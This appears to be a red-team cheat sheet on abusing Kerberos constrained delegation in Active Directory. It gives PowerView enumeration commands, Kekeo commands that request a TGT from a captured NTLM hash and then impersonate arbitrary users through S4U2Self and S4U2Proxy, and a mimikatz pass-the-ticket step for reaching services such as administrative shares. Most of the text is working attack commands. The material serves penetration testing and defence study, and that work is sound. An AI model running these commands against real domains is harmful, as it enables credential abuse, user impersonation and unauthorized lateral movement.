CONSTRAINED DELEGATION

Enumerate accounts with constrained delegation configured (PowerView). -TrustedToAuth matches objects whose msDS-AllowedToDelegateTo attribute is populated; that attribute lists the SPNs the account is allowed to delegate to, and the TRUSTED_TO_AUTH_FOR_DELEGATION bit (0x1000000) in useraccountcontrol shows whether protocol transition ("use any authentication protocol") is enabled. Computer accounts are enumerated the same way with Get-DomainComputer -TrustedToAuth.

Get-DomainUser -TrustedToAuth

Get-DomainUser -TrustedToAuth | Select -ExpandProperty samaccountname

Get-DomainUser -TrustedToAuth | Select samaccountname,useraccountcontrol,msds-allowedtodelegateto

Use Kekeo to request a TGT for the account that has constrained delegation configured. You need that account's NTLM hash (/rc4:) or its password (/password:). Kekeo writes the ticket to a .kirbi file in the current working directory.

tgt::ask /user:<CONSTRAINED SERVICE> /domain:<DOMAIN> /rc4:<NTLM>

Use that TGT to perform S4U2Self followed by S4U2Proxy: Kekeo first obtains a service ticket to itself on behalf of <USERNAME> (the user to impersonate, given as user@domain), then exchanges it for a service ticket to <SPN>. The SPN must be one of the entries in the delegating account's msDS-AllowedToDelegateTo or the KDC refuses the request. Two caveats: if the delegating account lacks TRUSTED_TO_AUTH_FOR_DELEGATION (Kerberos-only delegation), the S4U2Self ticket is not forwardable and S4U2Proxy fails; and users marked "Account is sensitive and cannot be delegated" or placed in the Protected Users group cannot be impersonated this way.

tgs::s4u /tgt:<TGT PATH> /user:<USERNAME>@<DOMAIN> /service:<SPN>

Pass the ticket with mimikatz: inject the S4U2Proxy ticket (the TGS for the target SPN, not the intermediate S4U2Self ticket that Kekeo also writes) into the current logon session, confirm it appears in klist, then access the service, e.g. \\host\c$ for a cifs SPN.

Invoke-Mimikatz -Command '"kerberos::ptt <TGS PATH>"'
